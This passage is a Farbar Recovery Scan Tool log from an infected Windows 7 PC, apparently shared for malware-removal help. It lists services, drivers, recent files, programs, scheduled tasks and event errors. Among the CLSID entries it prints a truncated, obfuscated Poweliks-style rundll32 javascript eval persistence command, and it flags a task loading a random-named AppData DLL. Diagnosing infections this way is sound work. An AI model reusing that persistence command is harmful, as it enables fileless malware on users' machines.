FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\RLMusicUnpacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\RLVoicePacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\RLVoiceUnpacker.dll ()

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AVGIDSAgent; C:\Program Files\AVG\AVG2015\avgidsagent.exe [3432976 2014-12-18] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG2015\avgwdsvc.exe [298080 2014-12-18] (AVG Technologies CZ, s.r.o.)
R2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [1678040 2013-10-02] (Broadcom Corporation.)
R2 SDScannerService; C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-26] (Microsoft Corporation)
S3 CaCCProvSP; "C:\Program Files\Total Defense\Internet Security Suite\ccprovsp.exe" [X]
S2 ccSchedulerSVC; C:\Program Files\Total Defense\Internet Security Suite\ccschedulersvc.exe [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 Acceler; C:\Windows\System32\DRIVERS\accelern.sys [44144 2011-10-03] (ST Microelectronics)
R1 Avgdiskx; C:\Windows\System32\DRIVERS\avgdiskx.sys [121624 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdriverx.sys [208152 2014-12-08] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [154904 2014-11-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSShim; C:\Windows\System32\DRIVERS\avgidsshimx.sys [21272 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [192792 2014-08-28] (AVG Technologies CZ, s.r.o.)
R0 Avglogx; C:\Windows\System32\DRIVERS\avglogx.sys [230680 2014-07-18] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [98584 2014-10-05] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [27416 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [200984 2014-10-10] (AVG Technologies CZ, s.r.o.)
R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [174936 2013-10-02] (Broadcom Corporation.)
S3 btwampfl; C:\Windows\System32\DRIVERS\btwampfl.sys [144600 2013-10-02] (Broadcom Corporation.)
R3 cvusbdrv; C:\Windows\System32\Drivers\cvusbdrv.sys [32808 2008-07-23] (Broadcom Corporation)
R3 NETwNs32; C:\Windows\System32\DRIVERS\Netwsn00.sys [10364416 2012-06-03] (Intel Corporation)
S2 risdpcie; C:\Windows\System32\DRIVERS\RISDPE64.SYS [79360 2009-10-28] (REDC) [File not signed]
R0 stdcfltn; C:\Windows\System32\DRIVERS\stdcfltn.sys [17904 2011-07-15] (ST Microelectronics)
S3 USB28xxBGA; C:\Windows\System32\DRIVERS\emBDAA.sys [660120 2012-05-04] (eMPIA Technology, Inc.)
S3 USB28xxOEM; C:\Windows\System32\DRIVERS\emOEMA.sys [1085592 2012-05-04] (eMPIA Technology, Inc.)
S3 catchme; \??\C:\Users\User\AppData\Local\Temp\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-24 16:11 - 2015-01-24 16:11 - 00050201 _____ () C:\ComboFix.txt
2015-01-24 13:30 - 2011-06-26 00:45 - 00256000 _____ () C:\Windows\PEV.exe
2015-01-24 13:30 - 2010-11-07 11:20 - 00208896 _____ () C:\Windows\MBR.exe
2015-01-24 13:30 - 2009-04-19 22:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2015-01-24 13:30 - 2000-08-30 18:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2015-01-24 13:30 - 2000-08-30 18:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2015-01-24 13:30 - 2000-08-30 18:00 - 00098816 _____ () C:\Windows\sed.exe
2015-01-24 13:30 - 2000-08-30 18:00 - 00080412 _____ () C:\Windows\grep.exe
2015-01-24 13:30 - 2000-08-30 18:00 - 00068096 _____ () C:\Windows\zip.exe
2015-01-24 13:28 - 2015-01-24 16:11 - 00000000 ____D () C:\Qoobox
2015-01-24 13:23 - 2015-01-24 16:08 - 00000000 ____D () C:\Windows\erdnt
2015-01-14 22:04 - 2015-01-24 17:32 - 00000000 ____D () C:\Users\User\Desktop\Malware stuff
2015-01-14 21:04 - 2015-01-24 17:32 - 00000000 ____D () C:\FRST
2015-01-14 19:59 - 2015-01-24 13:35 - 00000000 ___HD () C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
2015-01-13 22:17 - 2014-12-11 23:11 - 03971512 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2015-01-13 22:17 - 2014-12-11 23:11 - 03916728 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-01-13 21:13 - 2014-12-18 19:34 - 00116224 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2015-01-13 21:07 - 2014-12-18 20:43 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2015-01-13 21:07 - 2014-12-11 11:47 - 00056320 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2015-01-13 21:07 - 2014-12-05 21:50 - 00242688 _____ (Microsoft Corporation) C:\Windows\system32\nlasvc.dll
2015-01-12 09:58 - 2015-01-12 09:58 - 00000000 ____D () C:\Users\Default\AppData\Roaming\TuneUp Software
2015-01-12 09:58 - 2015-01-12 09:58 - 00000000 ____D () C:\Users\Default User\AppData\Roaming\TuneUp Software
2015-01-05 17:30 - 2015-01-07 17:21 - 00000000 ____D () C:\Users\User\Downloads\avast free
2015-01-02 13:33 - 2015-01-21 15:41 - 00034171 _____ () C:\Users\Public\Documents\Master Volunteer List thru Dec 2014.xlsx
2015-01-02 12:42 - 2015-01-02 12:42 - 00000165 ____H () C:\Users\Public\Documents\~$Master Volunteer List thru Nov 2014.xlsx

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-24 17:28 - 2014-06-15 13:21 - 00000000 ____D () C:\Users\User\AppData\Roaming\Battle.net
2015-01-24 17:28 - 2014-06-15 13:21 - 00000000 ____D () C:\Users\User\AppData\Local\Battle.net
2015-01-24 17:28 - 2014-06-15 13:19 - 00000000 ____D () C:\ProgramData\Battle.net
2015-01-24 17:20 - 2013-10-16 13:14 - 00000000 ___HD () C:\Program Files\InstallShield Installation Information
2015-01-24 17:19 - 2014-01-29 03:10 - 00000000 ____D () C:\Users\User\AppData\Local\Cyberlink
2015-01-24 17:19 - 2013-10-16 13:12 - 00000000 ____D () C:\Program Files\CyberLink
2015-01-24 17:05 - 2013-02-11 12:09 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-01-24 16:59 - 2009-07-13 22:34 - 00024832 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-01-24 16:59 - 2009-07-13 22:34 - 00024832 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-01-24 16:57 - 2013-10-02 18:48 - 01923169 _____ () C:\Windows\WindowsUpdate.log
2015-01-24 16:52 - 2013-02-09 05:35 - 01161134 _____ () C:\Windows\PFRO.log
2015-01-24 16:52 - 2009-07-13 22:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-01-24 16:52 - 2009-07-13 22:39 - 00049504 _____ () C:\Windows\setupact.log
2015-01-24 16:26 - 2014-08-13 20:31 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-01-24 16:22 - 2014-11-23 10:27 - 00000000 ____D () C:\ProgramData\MFAData
2015-01-24 16:11 - 2009-07-13 20:37 - 00000000 ___RD () C:\Users\Public
2015-01-24 16:04 - 2009-07-13 20:04 - 00000215 _____ () C:\Windows\system.ini
2015-01-22 13:07 - 2013-02-11 12:09 - 00701616 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2015-01-22 13:07 - 2013-02-11 12:09 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2015-01-14 21:01 - 2013-02-08 18:15 - 00781298 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-01-14 20:00 - 2014-11-10 08:03 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2015-01-13 23:28 - 2013-10-16 12:33 - 00000000 ____D () C:\Windows\system32\MRT
2015-01-13 23:24 - 2013-02-08 18:33 - 110348472 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2015-01-12 09:58 - 2014-11-23 11:33 - 00000935 _____ () C:\Users\Public\Desktop\AVG 2015.lnk
2015-01-12 09:58 - 2014-11-23 11:33 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2015-01-08 21:16 - 2014-05-14 17:47 - 00000000 ____D () C:\Users\Public\Documents\Kayla
2015-01-05 17:22 - 2014-08-13 20:31 - 00001060 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-01-05 17:22 - 2014-08-13 20:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-01-05 17:22 - 2014-08-13 20:31 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2015-01-02 13:30 - 2014-12-04 10:50 - 00032082 _____ () C:\Users\Public\Documents\Master Volunteer List thru Nov 2014.xlsx

==================== Files in the root of some directories =======

2014-11-04 21:33 - 2014-11-04 21:33 - 0000000 _____ () C:\Users\User\AppData\Roaming\qkmrs.dll
2013-12-25 09:47 - 2014-01-25 12:43 - 0005632 _____ () C:\Users\User\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2013-10-21 22:14 - 2013-10-21 22:14 - 0007602 _____ () C:\Users\User\AppData\Local\Resmon.ResmonCfg

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2015-01-14 17:23

==================== End Of Log ============================

Here is the Additional file:

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 24-01-2015 01
Ran by User at 2015-01-24 17:32:50
Running from C:\Users\User\Desktop\Malware stuff
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
AS: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 16 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 16.0.0.287 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.10) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated)
Advanced Audio FX Engine (HKLM\...\Advanced Audio FX Engine) (Version: 1.12.05 - Creative Technology Ltd)
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5645 - AVG Technologies)
AVG 2015 (Version: 15.0.4273 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.5645 - AVG Technologies) Hidden
CorelVHS3X86 (HKLM\...\{CB91D8EE-AAC8-4921-AFCB-DB700EEF9D9B}) (Version: 1.05.0000 - Corel)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Dell System Detect (HKU\S-1-5-21-3179565126-1180787063-359821708-1000\...\73f463568823ebbe) (Version: 5.12.0.3 - Dell)
Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.1007.101.210 - ALPS ELECTRIC CO., LTD.)
Dell Webcam Central (HKLM\...\Dell Webcam Central) (Version: 1.40.05 - Creative Technology Ltd)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version: 14.8 - Intel)
Java 7 Update 71 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Junk Mail filter update (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Live! Cam Avatar Creator (HKLM\...\{65D0C510-D7B6-4438-9FC8-E6B91115AB0D}) (Version: 4.6.3009.1 - Creative Technology Ltd)
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-3179565126-1180787063-359821708-1000\...\SkyDriveSetup.exe) (Version: 16.4.6013.0910 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Movie Maker (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
OpenOffice 4.0.1 (HKLM\...\{47F460DA-D1BE-4D85-8DF2-AA1F31D3445F}) (Version: 4.01.9714 - Apache Software Foundation)
Revo Uninstaller 1.95 (HKLM\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Spybot - Search & Destroy (HKLM\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}\InprocServer32 -> C:\Program Files\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll No File
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\localserver32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\localserver32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\FileSyncApi.dll (Microsoft Corporation)

==================== Restore Points  =========================

24-01-2015 13:30:52 ComboFix created restore point
24-01-2015 17:17:02 Configured PowerDVD
24-01-2015 17:21:57 Revo Uninstaller's restore point - Battle.net

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 20:04 - 2015-01-24 16:03 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {24101962-EFCD-48A3-9588-FE6571943DD3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {2E82AEF7-774A-4868-BDA0-4176292D000C} - System32\Tasks\{EBC0B43D-34B9-407B-966A-63943AD95EE7} => C:\Program Files\Freemake\Freemake Video Converter\FreemakeVideoConverter.exe
Task: {4480FA26-0DE2-4425-8D00-BFBA97D00B67} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files\Spybot - Search & Destroy 2\SDImmunize.exe
Task: {534DD19A-C485-4F2C-8C31-A3D51C2B3CFD} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files\Spybot - Search & Destroy 2\SDScan.exe
Task: {5A6E07FB-BBC2-486C-8AF9-3ECD66601DA8} - \BrowserSafeguard Update Task No Task File <==== ATTENTION
Task: {71519836-8433-4BC1-A669-7BFFA4D8575A} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-10] (PC-Doctor, Inc.)
Task: {A27C9E40-6522-4874-B404-6587317BB031} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe
Task: {B0AD704E-4AD4-4673-AFD9-33AED5FFFD0D} - \Optimizer Pro Schedule No Task File <==== ATTENTION
Task: {BE538E25-6810-47D7-9746-96E8507E6CDE} - \BrowserSafeguard No Task File <==== ATTENTION
Task: {E919B31C-4400-4B2E-8926-FAA405BBA3E3} - System32\Tasks\{9BEDCEF3-9189-5EED-E739-0431EB9E4EBE} => C:\Users\User\AppData\Roaming\dkpxfv.dll/s "C:\Users\User\AppData\Roaming\dkpxfv.dll" <==== ATTENTION
Task: {FE1E3EA7-3A55-42D9-B9F4-A40D5FDEA276} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2015-01-22] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Loaded Modules (whitelisted) =============

2014-11-23 21:08 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2014-11-23 21:08 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files\Spybot - Search & Destroy 2\DEC150.bpl
2014-11-23 21:08 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2014-11-23 21:08 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files\Spybot - Search & Destroy 2\sqlite3.dll
2014-11-23 21:08 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2012-01-10 22:12 - 2012-01-10 22:12 - 00094208 _____ () C:\Windows\System32\IccLibDll.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:373E1720

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

========================= Accounts: ==========================

Administrator (S-1-5-21-3179565126-1180787063-359821708-500 - Administrator - Disabled)
Guest (S-1-5-21-3179565126-1180787063-359821708-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3179565126-1180787063-359821708-1002 - Limited - Enabled)
User (S-1-5-21-3179565126-1180787063-359821708-1000 - Administrator - Enabled) => C:\Users\User

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (01/24/2015 05:17:00 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005, Access is denied.
.
This is often caused by incorrect security settings in either the writer or requestor process.

Operation:
   Gathering Writer Data

Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {989c0791-8944-4af3-9e28-21583bc66cc7}

Error: (01/23/2015 00:59:11 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.17496 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 2328

Start Time: 01d0365772617e5f

Termination Time: 1607

Application Path: C:\Program Files\Internet Explorer\iexplore.exe

Report Id:

Error: (01/22/2015 02:30:08 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc292
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00120dbf
Faulting process id: 0x119a4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 01:14:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x525b84d1
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00120dbf
Faulting process id: 0xcc44
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 10:01:04 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc959
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00120dbf
Faulting process id: 0x3a14
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 09:04:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc6b8
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x001202bc
Faulting process id: 0x17a0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 08:10:52 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.17496 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 3880

Start Time: 01d035c7218aa0dd

Termination Time: 919

Application Path: C:\Program Files\Internet Explorer\iexplore.exe

Report Id:

Error: (01/22/2015 07:29:55 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bcbb9
Faulting module name: Flash32_16_0_0_257.ocx, version: 16.0.0.257, time stamp: 0x549259f5
Exception code: 0xc0000005
Fault offset: 0x006a6dfa
Faulting process id: 0x292c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 07:25:15 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc100
Faulting module name: Flash32_16_0_0_257.ocx, version: 16.0.0.257, time stamp: 0x549259f5
Exception code: 0xc0000005
Fault offset: 0x006a6dfa
Faulting process id: 0x29bc
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/21/2015 09:10:40 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bcb52
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x001202bc
Faulting process id: 0x3a2c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

System errors:
=============
Error: (01/24/2015 05:16:38 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.

Error: (01/24/2015 05:16:35 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.

